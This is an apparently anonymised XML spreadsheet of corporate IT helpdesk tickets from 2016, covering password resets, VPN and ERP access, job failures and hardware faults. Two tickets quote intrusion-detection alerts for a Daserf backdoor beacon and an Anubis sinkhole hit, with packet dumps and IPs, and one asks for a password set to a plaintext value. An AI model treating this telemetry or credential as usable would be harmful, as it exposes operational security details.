[cid:image001.jpg@01SID_3542b.d1ad7200]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>monitor in der stÃ¤be-endkontrolle defekt</t>
  </si>
  <si>
    <t>user password</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: bswlorek.yhdrlgbs@gmail.com_x000D_
_x000D_
hi team,_x000D_
_x000D_
could you please reset password from user â€ždw0021" to daypay3?_x000D_
the user forgot her password._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bwa index for bw queries failed due to bwa server is overloaded</t>
  </si>
  <si>
    <t xml:space="preserve">dear team,_x000D_
_x000D_
we are facing errors in bwa indexing of quer) in SID_37 due to bwa server is over loaded error. i have checked the filters for those queries and it is only for 3 months' data (fy 17)._x000D_
_x000D_
please suggest if all the servers (bwa) are not overloaded and operating fine and request to provide a resolution at an earliest._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>problems with creating pgi in transaction vl02n, because we can't enter the batch</t>
  </si>
  <si>
    <t>problems with creating pgi in transaction vl02n, because we can't enter the batch when we need it, and every time when we need enter the batch we asking about it our german warehouse colleagues. they sad us, that this function are locked in my erp account. could you help me please?</t>
  </si>
  <si>
    <t>alenrdvz mhglqndp</t>
  </si>
  <si>
    <t>maus defekt .</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,_x000D_
ich und howfanzi siavgtby  brauchen eine neue anstÃ¤ndige maus._x000D_
wÃ¤hre schÃ¶n wenn du sie kurzfristig uns vorbei bringen kÃ¶nnuacyltoe hxgaycze._x000D_
</t>
  </si>
  <si>
    <t>tkhaymqg cwuqzyvm</t>
  </si>
  <si>
    <t>maus defekt</t>
  </si>
  <si>
    <t>howfanzi siavgtby</t>
  </si>
  <si>
    <t>probleme mit symantec \ konferenzraum stÃ¤be \nozahtbr ubznqpsy</t>
  </si>
  <si>
    <t>nozahtbr ubznqpsy</t>
  </si>
  <si>
    <t>drucker defekt in der qs</t>
  </si>
  <si>
    <t>fehlermeldung   59.fo</t>
  </si>
  <si>
    <t>phqgtfbn lzdntwpr</t>
  </si>
  <si>
    <t>vpn connection</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xwertljy.zrmlhkyq@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please help me to connect to vpn i am not able to._x000D_
matheywter urgent._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>network outage:india , in-company- carrier:site is hard down since at 6:12 am et on 09/21.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______6:12 am et on 09/21________________x000D_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_no_______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</si>
  <si>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pasword and connection problem</t>
  </si>
  <si>
    <t>i don't reach pasword manager pages. it says security problem for this connection.</t>
  </si>
  <si>
    <t>mvhcoqed konjdmwq</t>
  </si>
  <si>
    <t>reset passwords for mvhcoqed konjdmwq using password_management_tool password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1392 failed in job_scheduler at: 09/21/2016 06:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1392 failed in job_scheduler at: 09/21/2016 06:13:00</t>
  </si>
  <si>
    <t>HostName_809 : usa plant ups is down at 4 am et on 09/21.</t>
  </si>
  <si>
    <t>erp csd cockpit application: condition update not possible</t>
  </si>
  <si>
    <t>erp csd cockpit application: condition update not possible_x000D_
not possible to built up an price record  (21.09.16 gt 11:21)_x000D_
quote 3116246099 line item 10</t>
  </si>
  <si>
    <t>ivcygqta qiovrcal</t>
  </si>
  <si>
    <t>euyvqblc ietfqpga</t>
  </si>
  <si>
    <t>HostName_239 : volume: /dev/ora_data2  is over 85% space consumed. space available: 2.9 g</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_239 : volume: /dev/ora_data2  is over 85% space consumed. space available: 2.9 g_x000D_
</t>
  </si>
  <si>
    <t>qlhmawgi sgwipoxn : roaghyunokepc locked</t>
  </si>
  <si>
    <t>my SID_1  system is been locked, can you  unlock it.</t>
  </si>
  <si>
    <t>my SID_1  system is been locked, can you  unlock it.
my user id is- vvhstyap</t>
  </si>
  <si>
    <t>jdocyzgq gdvmjnso</t>
  </si>
  <si>
    <t>collaboration_platform access not going through</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: byrljshv.bwvmophd@gmail.com_x000D_
_x000D_
to the concerned,_x000D_
_x000D_
i am unable to access to the collaboration_platform. (_x000D_
please resolve it at the earliest._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>glwtihcj lymcgjhd</t>
  </si>
  <si>
    <t>aiuw8911994 india patching_antivirus_sw desktop server is offline</t>
  </si>
  <si>
    <t>this pc is offline since 19th sept</t>
  </si>
  <si>
    <t>order products online problem</t>
  </si>
  <si>
    <t xml:space="preserve">from: -ebusiness service 
sent: wednesday, september 21, 2016 11:39 am
to: jfwvuzdn xackgvmd
cc: nwfodmhc exurcwkm
subject: radgthika: order products online problem
hello,
the issue is that your userid is locked in erp SID_34 and in erp SID_39.
you need to go to the password_management_tool password manager and first select the option "unlock accounts", after that select the option "change password"
once that is completed successfully, you should logon to distributor_tool with that new password.
mit freundlichem gruÃŸ / kind </t>
  </si>
  <si>
    <t>erpæ— æ³•ç™»å½•ï¼Œæç¤ºlogon balancing error 88 .</t>
  </si>
  <si>
    <t xml:space="preserve">gartryhuï¼š_x000D_
ä½ å¥½ï¼Œä»Žæ˜¨å¤©æ™šä¸Šå¼€å§‹ï¼Œæˆ‘çš„erpç™»å½•æŒç»­å‡ºçŽ°ä»¥ä¸‹é”™è¯¯ï¼Œè¯·å¸®å¿™çœ‹çœ‹ä»€ä¹ˆåŽŸå› ï¼_x000D_
åœ¨å®¶é‡Œvpnå’Œå…¬å¸ç›´æŽ¥ç™»å½•éƒ½æ˜¯è¿™æ ·ï¼_x000D_
å¤šè°¢äº†_x000D_
best </t>
  </si>
  <si>
    <t>agzswjku kqwofdjl</t>
  </si>
  <si>
    <t>security incidents - ( #in33932723 ) : possible daserf trojan (apt activity) - leengineering_tool-201-zhm</t>
  </si>
  <si>
    <t>source ip: 10.44.63.52_x000D_
source hostname: leengineering_tool-201-zhm_x000D_
destination ip: 218.84.244.31_x000D_
system name :_x000D_
user  name:_x000D_
location :_x000D_
sep , sms status :_x000D_
field sales user ( yes / no) :  _x000D_
dsw event log:see below_x000D_
--------------------------------------------------------------------------------------------------------------------------------------_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 94845494_x000D_
event summary: 52798 vid75839 daserf backdoor phoning home (apt activity)_x000D_
occurrence count: 1_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 10.44.63.52_x000D_
source hostname: leengineering_tool-201-zhm_x000D_
source port: 3475_x000D_
destination ip: 218.84.244.31_x000D_
destination port: 80_x000D_
destination ip geolocation: urumqi, chn_x000D_
connection directionality: outgoing_x000D_
protocol: tcp_x000D_
http method: get_x000D_
user agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)_x000D_
host: es.f.360.cn_x000D_
full url path: /stats.php_x000D_
_x000D_
device information_x000D_
device ip: 80.68.49.4169_x000D_
device name: isensor05.company.com_x000D_
log time: 2016-09-20 at 23:58:57 utc_x000D_
action: not blocked_x000D_
vendor eventid: 591748_x000D_
cvss score: -1 _x000D_
vendor priority: 1_x000D_
vendor version: 7_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 2174626_x000D_
inspector rule id: 277082_x000D_
inspector event id: 891373519_x000D_
ontology id: 200020003203759120_x000D_
event type id: 200020003203703260_x000D_
agent id: 102835_x000D_
_x000D_
event detail:_x000D_
[**] [1:21163809:2] 52798 vid75839 daserf backdoor phoning home (apt activity) [**]_x000D_
[classification: none] [priority: 1] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 606873][event id: 591748][time: 2585526048.971531]_x000D_
[src ip: 10.44.63.52][dst ip: 218.84.244.31][sport/itype: 3475][dport/icode: 80][proto: 6]_x000D_
09/20/2016-23:58:57.97153sartlgeo lhqksbdx0.44.63.52:3475 -&gt; 218.84.244.31:80_x000D_
tcp ttl:61 tos:0x0 id:44699 iplen:20 dgmlen:180 df_x000D_
***ap*** seq: 0x85f0af80 ack: 0xf50449c6 win: 0xb5c9 tcplen: 20_x000D_
==pcap 1==_x000D_
_x000D_
_x000D_
[ex http_uri 9: /stats.php]_x000D_
_x000D_
[ex http_hostname 10: es.f.360.cn]_x000D_
_x000D_
[o:security]_x000D_
_x000D_
ascii packet(s):_x000D_
==pcap 1 ascii s==_x000D_
....a..w............e.....@.=.v..,?4.t.....p......i.p.......get./stats.php.http/1.1..user-agent:.mozilla/4.0.(compatible;.msie.6.0;.windows.nt.5.1;.sv1)..host:.es.f.360.cn..cache-control:.no-cache...._x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000 0c00 0000 41cd e157 0bd3 0e00 b400 0000 ....a..w........_x000D_
000010 b400 0000 4500 00b4 ae9b 4000 3d06 76d4 ....e.....@.=.v._x000D_
000020 0a2c 3f34 da54 f41f 0d93 0050 85f0 af80 .,?4.t.....p...._x000D_
000030 f504 49c6 5018 b5c9 f190 0000 4745 5420 ..i.p.......get._x000D_
000040 2f73 7461 7473 2e70 6870 2048 5454 502f /stats.php.http/_x000D_
000050 312e 310d 0a55 7365 722d 4167 656e 743a 1.1..user-agent:_x000D_
000060 204d 6f7a 696c 6c61 2f34 2e30 2028 636f .mozilla/4.0.(co_x000D_
000070 6d70 6174 6962 6c65 3b20 4d53 4945 2036 mpatible;.msie.6_x000D_
000080 2e30 3b20 5769 6e64 6f77 7320 4e54 2035 .0;.windows.nt.5_x000D_
000090 2e31 3b20 5356 3129 0d0a 486f 7374 3a20 .1;.sv1)..host:._x000D_
0000a0 6573 2e66 2e33 3630 2e63 6e0d 0a43 6163 es.f.360.cn..cac_x000D_
0000b0 6865 2d43 6f6e 7472 6f6c 3a20 6e6f 2d63 he-control:.no-c_x000D_
0000c0 6163 6865 0d0a 0d0a ache...._x000D_
==pcap 1 hex e==</t>
  </si>
  <si>
    <t>security incidents - ( #in33924718 ) : possible malware infection - traffic from sinkhole domain to android-13849fa3</t>
  </si>
  <si>
    <t>source ip :195.22.28.222_x000D_
destination ip: 12.90.42.78296_x000D_
destination hostname: android-13849fa3e9c2e1e3_x000D_
destination port: 50060_x000D_
user  name:_x000D_
location :_x000D_
sep , sms status :_x000D_
field sales user ( yes / no) :  _x000D_
dsw event log:see below_x000D_
----------------------------------------------------------------------------------------------------_x000D_
=========================_x000D_
event data_x000D_
=========================_x000D_
related events: _x000D_
event id: 84313125_x000D_
event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000D_
occurrence count: 2_x000D_
event count: 1_x000D_
_x000D_
host and connection information_x000D_
source ip: 195.22.28.222_x000D_
source port: 80_x000D_
source ip geolocation: lisbon, prt_x000D_
destination ip: 12.90.42.78296_x000D_
destination hostname: android-13849fa3e9c2e1e3_x000D_
destination port: 50060_x000D_
destination mac address: 84:38:38:49:8e:8c_x000D_
connection directionality: incoming_x000D_
protocol: tcp_x000D_
http status code: 302_x000D_
_x000D_
device information_x000D_
device ip: 10.16.4.16_x000D_
device name: isensor04.company.com_x000D_
log time: 2016-09-20 at 14:52:40 utc_x000D_
action: not blocked_x000D_
vendor eventid: 658837_x000D_
cvss score: -1 _x000D_
vendor priority: 2_x000D_
vendor version: 7_x000D_
_x000D_
scwx event processing information_x000D_
sherlock rule id (sle): 699417_x000D_
inspector event id: 637894958_x000D_
ontology id: 200020003203755736_x000D_
event type id: 200020003203582148_x000D_
agent id: 102823_x000D_
_x000D_
event detail:_x000D_
[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]_x000D_
[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]_x000D_
[sensor id: 602983][event id: 658837][time: 2585494271.714897]_x000D_
[src ip: 195.22.28.222][dst ip: 12.90.42.78296][sport/itype: 80][dport/icode: 50060][proto: 6]_x000D_
09/20/2016-14:52:40.714897 195.22.28.222:80 -&gt; 12.90.42.78296:50060_x000D_
tcp ttl:55 tos:0x0 id:21367 iplen:20 dgmlen:395 df_x000D_
***ap*** seq: 0x6160cb68 ack: 0x767501ef win: 0x35 tcplen: 32_x000D_
tcp options (3) =&gt; nop nop ts: 4874825104 23401168 _x000D_
==pcap 1==_x000D_
_x000D_
[o:security]_x000D_
_x000D_
[correlation_data]_x000D_
sep 20 07:09:48 60.43.89.120 dhcpd[31183]: dhcpack on 12.90.42.78296 to 84:38:38:49:8e:8c (android-13849fa3e9c2e1e3) via eth2 relay 10.16.16.2 lease-duration 604800 (renew)_x000D_
_x000D_
ascii packet(s):_x000D_
==pcap 1 ascii s==_x000D_
....8m.w............e...sw@.7..-.........p..a`.hvu.....5.........u.-....http/1.1.302.moved.temporarily..server:.nginx..date:.tue,.20.sep.2016.14:52:40.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=26fd9b636b17e81f718dba282f5d46eb;.domain=.allinvest.us..location:._x000D_
==pcap 1 ascii e==_x000D_
_x000D_
hex packet(s):_x000D_
==pcap 1 hex s==_x000D_
000000 0c00 0000 384d e157 91e8 0a00 8b01 0000 ....8m.w........_x000D_
000010 8b01 0000 4500 018b 5377 4000 3706 f42d ....e...sw@.7..-_x000D_
000020 c316 1cde 0a10 10c4 0050 c38c 6160 cb68 .........p..a`.h_x000D_
000030 7675 01ef 8018 0035 fcf2 0000 0101 080a vu.....5........_x000D_
000040 e055 b82d 00bd 0ea9 4854 5450 2f31 2e31 .u.-....http/1.1_x000D_
000050 2033 3032 204d 6f76 6564 2054 656d 706f .302.moved.tempo_x000D_
000060 7261 7269 6c79 0d0a 5365 7276 6572 3a20 rarily..server:._x000D_
000070 6e67 696e 780d 0a44 6174 653a 2054 7565 nginx..date:.tue_x000D_
000080 2c20 3230 2053 6570 2032 3031 3620 3134 ,.20.sep.2016.14_x000D_
000090 3a35 323a 3430 2047 4d54 0d0a 436f 6e74 :52:40.gmt..cont_x000D_
0000a0 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-type:.text/h_x000D_
0000b0 746d 6c0d 0a43 6f6e 6e65 6374 696f 6e3a tml..connection:_x000D_
0000c0 2063 6c6f 7365 0d0a 5365 742d 436f 6f6b .close..set-cook_x000D_
0000d0 6965 3a20 616e 6274 723d 3236 6664 3962 ie:.anbtr=26fd9b_x000D_
0000e0 3633 3662 3137 6538 3166 3731 3864 6261 636b17e81f718dba_x000D_
0000f0 3238 3266 3564 3436 6562 3b20 646f 6SID_26 282f5d46eb;.doma_x000D_
000100 696e 3d2e 616c 6c69 6e76 6573 742e 7573 in=.allinvest.us_x000D_
000110 0d0a 4c6f 6361 7469 6f6e 3a20 6874 7470 ..location:.http_x000D_
000120 3a2f 2f78 7373 6f2e 6865 6c70 2e61 6c6c ://xsso.help.all_x000D_
000130 696e 7665 7374 2e75 732f 3236 6664 3962 invest.us/26fd9b_x000D_
000140 3633 3662 3137 6538 3166 3731 3864 6261 636b17e81f718dba_x000D_
000150 3238 3266 3564 3436 6562 0d0a 0d0a 476f 282f5d46eb....go_x000D_
000160 2068 7474 703a 2f2f 7873 736f 2e68 656c ._x000D_
000170 702e 616c 6c69 6e76 6573 742e 7573 2f32 p.allinvest.us/2_x000D_
000180 3666 6439 6236 3336 6231 3765 3831 6637 6fd9b636b17e81f7_x000D_
000190 3138 6462 6132 3832 6635 6434 3665 62 18dba282f5d46eb_x000D_
==pcap 1 hex e==</t>
  </si>
  <si>
    <t>folder access request</t>
  </si>
  <si>
    <t>(\\HostName_768) (t:\\finance\global bank bals fy17_x000D_
_x000D_
group : lhqfinglbalfy17fc_x000D_
owner : pjxclyhs fcniljtu_x000D_
access : full control</t>
  </si>
  <si>
    <t>phvkowml azbtkqwx</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_495 failed in job_scheduler at: 09/21/2016 03:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_495 failed in job_scheduler at: 09/21/2016 03:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">do not have permission to ess portal. at </t>
  </si>
  <si>
    <t>please reach out to me for more information if needed.</t>
  </si>
  <si>
    <t>mm#3342477 | mm#5270584 | mm#5270486 | mm#4166346</t>
  </si>
  <si>
    <t xml:space="preserve">hi_x000D_
_x000D_
please see below pricing team comments and advise on above mentioned materials ;-_x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>kfhnmtgi boxmklnp</t>
  </si>
  <si>
    <t>batch number is not appearing in pdf output of engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">dear bhughjdra,
this is a good enquiry. agree batch number view is important too.
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_481 failed in job_scheduler at: 09/21/2016 03:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_481 failed in job_scheduler at: 09/21/2016 03:13:00</t>
  </si>
  <si>
    <t>e-time ç³»ç»Ÿjavaæ›´æ–°-è½¬è´ºæ­£å¹³</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tuqrvowp.fxmzkvqo@gmail.com
dear heï¼Œ
é’±å”é‘«å’Œåˆ˜æ™“å†¬e-timeç³»ç»Ÿçš„javeéœ€è¦æ›´æ–°ã€‚
è°¢è°¢
tuqrvowp fxmzkvqo é’±å”é‘«
human resources
tuqrvowp.fxmzkvqo@gmail.com&lt;mailto:tuqrvowp.fxmzkvqo@gmail.com&gt;
ä¸Šæµ·å‡é˜³è¶…å¾®ç²‰æœ‰é™å…¬å¸
ä¸Šæµ·å¸‚å¥‰è´¤åŒºé™ˆæ¡¥è·¯1508å·
é‚®ç¼–ï¼š201400
</t>
  </si>
  <si>
    <t>distributor_tool account identification problem</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pgeknaxy.usokqprd@gmail.com_x000D_
_x000D_
hello team,_x000D_
_x000D_
as you can see at the below sreenshot, my distributor_tool account did not identified for sales organisation. so i can not do anything at the distributor_tool._x000D_
_x000D_
could you please help me for this issue?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>pgeknaxy usokqprd</t>
  </si>
  <si>
    <t>maschinenstillstand ma 7 kesm , fernwartung notwendig; z. hd. herr himghtmelreich</t>
  </si>
  <si>
    <t xml:space="preserve">maschinenstillstand ma 7 kesm , fernwartung notwendig
tel.  herr teichgrÃ¤ber    </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1390 failed in job_scheduler at: 09/21/2016 02:54:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1390 failed in job_scheduler at: 09/21/2016 02:54:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1332 failed in job_scheduler at: 09/21/2016 02:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1332 failed in job_scheduler at: 09/21/2016 02:51:00</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bcefayom.lzhwcgvb@gmail.com
shathyra, lunjuws
zd13 is the delivery output type which was developed for baker huges when usa went live on erp..
delivery note output type "zdus" will be added automatically as soon as the delivery note is created if there is no specific customer specific output type maintained.
in this scenario since we have already a customer specific output "zd13" maintained in output config, "zdus" will be automatically replaced with "zd13" &amp; it will print immediately in "hx08"printer. (printer hx08 has been defined as default printer for sales org 1101 and customer 81917193 combination).
[cid:image003.png@01SID_353fb.6857f6c0]
the complexity is that we are shipping to customer "81917193" from both usa and usa.
can you please confirm if we are using z_chk to print the delivery note usa.
lunjuws: we need your help to check with usa team if they are using z_chk for printing delivery note..
based on the above information we shall check on the possibilities and let you know..
chandruhdty
[ a.n ]
senior analyst - global it 
---------------------------------------------------------
bcefayom.lzhwcgvb@gmail.com&lt;mailto:bcefayom.lzhwcgvb@gmail.com&gt;
please don't print this email unless you really need to - this will preserve trees on planet earth.
from: damuphws arkulcoi
sent: 20 september 2016 04:35
to: smxoklny hbecskgl
subject: need a little help--please
sorry, i never email you to just say hey-how's it going...but you know how it's going-i'm sure.....   :)
my dilemma is-since we have started shipping to bakyhrer huhuyghes-our delivery notes are still printing to usa.  who do i need to contact about this?  if it is the help desk-i'm not sure what/how to ask for it.  they aren't as easy to explain stuff to as you are...  we are wanting the transaction "zdus" to be added to  the delivery output screen, instead of zd13.    usa used zd13   we were using zd12   but zdus is what we really need to be using.
  if i have talked myself in circles   let me know and i'll try to explain it a little better.
this is an example of  what we want
[cid:image001.png@01SID_353fa.f482f2e0]
this is what we get right now  after we go in and add the zd12 to get a delivery note to print here---
[cid:image002.png@01SID_353fa.f482f2e0]
  </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1378 failed in job_scheduler at: 09/21/2016 02:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1378 failed in job_scheduler at: 09/21/2016 02:43:00</t>
  </si>
  <si>
    <t>lhqSID_1856-new</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ctvaejbo.mjcerqwo@gmail.com
hi,
i'm trying to install a license server on this new server.
i was just logged onto it, but it now appears to be unavailable?
pollaurid d phlpiops
manager engineering technology
</t>
  </si>
  <si>
    <t>leantracker anmeldung funktioniert nicht</t>
  </si>
  <si>
    <t>lean tracker Ã¶ffnet nicht. fehlermeldung erscheint.</t>
  </si>
  <si>
    <t>minitab to be installed</t>
  </si>
  <si>
    <t>name:wnorzsyv mdflqwxg
language:
browser:microsoft internet explorer
email:wnorzsyv.mdflqwxg@gmail.com
customer number:
telephone:
summary:minitab to be installed</t>
  </si>
  <si>
    <t>wnorzsyv mdflqwxg</t>
  </si>
  <si>
    <t>erp access issue: please reset SID_34 password for pandepv</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):_x000D_
_x000D_
enter user id of user having the issue:_x000D_
_x000D_
transaction code(s) the user needs or was working with:_x000D_
_x000D_
describe the issue:_x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t>lqxhoyic ojxkuftc</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xqkydoat.bveiyclr@gmail.com_x000D_
_x000D_
dear sir,_x000D_
refer below snapshot of pdf output of engineering_tool._x000D_
batch number is not appearing in pdf output._x000D_
[cid:image008.jpg@01SID_35366.4a922790]_x000D_
_x000D_
why batch number is important?_x000D_
in case of variation in tool life from batch to batch, customer raises the complaint. we send ccif with engineering_tool. in engineering_tool software we enter batch number but when i download pdf, it doesn't show batch number. without batch number, analysis cannot be done. that's why it's very important to capture batch number in engineering_tool pdf output._x000D_
_x000D_
for your necessary action._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>xqkydoat bveiyclr</t>
  </si>
  <si>
    <t>network outage: poncacity -schlumhdyhter-dmvpn-rtr is down since 11:56 pm et on 09/20.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________ 11:56 pm et on 09/20.______________x000D_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__na______     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____no_____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</si>
  <si>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wlan guest access for cantine germany</t>
  </si>
  <si>
    <t xml:space="preserve">from: xvwchsdg pladjmxt 
sent: tuesday, september 20, 2016 5:12 pm
to: dwfiykeo argtxmvcumar3
cc: thomklmas woehyl
subject: wlan guest access for cantine germany
hello manjgtiry,
we are having issues connecting to guest wlan with an 3rd party adapter which has worked before (
built in wifi adapter from their notebook is working just fine. both of the adapters are able to find the ssid.
is it possible that the mac-address of the edimax is in some kind of quarantine? (74-da-38-3b-f1-58)
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1374 failed in job_scheduler at: 09/21/2016 00:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1374 failed in job_scheduler at: 09/21/2016 00:32:00</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for xgrhplvk.coejktzn@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: wednesday, september 21, 2016 8:24 am
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: request to reset microsoft online services password for xgrhplvk.coejktzn@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ xgrhplvk.coejktzn@gmail.com 
â€¢ first name: babhjbu 
â€¢ last name: gdgy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</si>
  <si>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wvaksnpy vnixhytj</t>
  </si>
  <si>
    <t>not able to access -inq industrial (-inq.industrial@company.com)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: muqdlobv.qflsdahg@gmail.com_x000D_
_x000D_
team,_x000D_
_x000D_
i am not able access to -inq industrial (-inq.industrial@company.com&lt;mailto:-inq.industrial@company.com&gt;) for which we receive enquiries about special products._x000D_
from past one week above mentioned shared email box is not functioning for me, whereas other members are able to access the same._x000D_
so i kindly request you to take it upon high priority and confirm back._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>muqdlobv qflsdahg</t>
  </si>
  <si>
    <t>expense report -  receipts issue</t>
  </si>
  <si>
    <t>one of my employees sent his expenses to me today and there were notes all over it that there were no receipts.  he has the receipts for everything.  how should this be handled?</t>
  </si>
  <si>
    <t>cyxulwmi lygbewdi</t>
  </si>
  <si>
    <t>two billings were not posted to gl 9169221558 6th sept &amp; 9169338118 18th sept</t>
  </si>
  <si>
    <t>name:jashtyckie
language:
browser:microsoft internet explorer
email:jacyjddwline.yotywdsef@company.com
customer number:
telephone:
summary:two billings were not posted to gl 9169221558 6th sept &amp; 9169338118 18th sept</t>
  </si>
  <si>
    <t>vpn will not allow access to erp</t>
  </si>
  <si>
    <t>name:pfzxecbo ptygkvzl_x000D_
language:_x000D_
browser:microsoft internet explorer_x000D_
email:pfzxecbo.ptygkvzl@gmail.com_x000D_
customer number:_x000D_
telephone:_x000D_
summary:vpn will not allow access to erp.  this is the 3rd occurrence of the same issue.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2555 failed in job_scheduler at: 09/20/2016 22:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2555 failed in job_scheduler at: 09/20/2016 22:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_51filesys failed in job_scheduler at: 09/20/2016 20:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_51filesys failed in job_scheduler at: 09/20/2016 20:11:00</t>
  </si>
  <si>
    <t>ç”µè¯æ•…éšœ</t>
  </si>
  <si>
    <t>é“¸æ£’è½¦é—´ç”µè¯æ•…éšœï¼Œ39523850</t>
  </si>
  <si>
    <t>sbkhjigv pbvlfcse</t>
  </si>
  <si>
    <t>laptop can't log on</t>
  </si>
  <si>
    <t>xielgjvr sqjxewmh</t>
  </si>
  <si>
    <t>upsæ•…éšœ</t>
  </si>
  <si>
    <t>åˆ¶ç²‰è½¦é—´3æ¥¼psfäº¤æ¢æœºå¤„upsæ•…éšœï¼Œè®¾å¤‡æ— ä»»ä½•ååº”ã€‚</t>
  </si>
  <si>
    <t>agyvbnwz mxsonkdc</t>
  </si>
  <si>
    <t>internal crm - auto notification, not received</t>
  </si>
  <si>
    <t>crm 7611183702 - when the responsible user updated its status as "final review" it generally dispatch the auto-notification email to the crm owner but i have not received the notification. the key user confirmed it hasn't sent to me. reference to the attached email communication. please investigate why.</t>
  </si>
  <si>
    <t>SID_1 access beathe</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: uisewznr.ewtmkphs@gmail.com_x000D_
_x000D_
hi team,_x000D_
_x000D_
i am having issues logging into SID_1. i have reset my password in password manager, but still cannot access it. can you please assist? </t>
  </si>
  <si>
    <t>a dell search icon is running all the time slowing the laptop down</t>
  </si>
  <si>
    <t>name:danyhuie deyhtwet
language:
browser:microsoft internet explorer
email:rozsyfai.zncajubh@gmail.com
customer number:
telephone:
summary:new laptop. a dell search icon is running all the time slowing the laptop down</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1315 failed in job_scheduler at: 09/20/2016 18:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1315 failed in job_scheduler at: 09/20/2016 18:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">add rohhsyni lalanne to shipment notification notice.  </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ibtvlfah.dtlwscma@gmail.com
add e-mail address to shipment notification for customer # 81917193
see example attached.
lalanne, rohhsyni c &lt;rohhsyni.lalanne@bakheyr rjuyihes.com&gt;
</t>
  </si>
  <si>
    <t>ibtvlfah dtlwscma</t>
  </si>
  <si>
    <t>tax not printing on customer inwarehouse_tools</t>
  </si>
  <si>
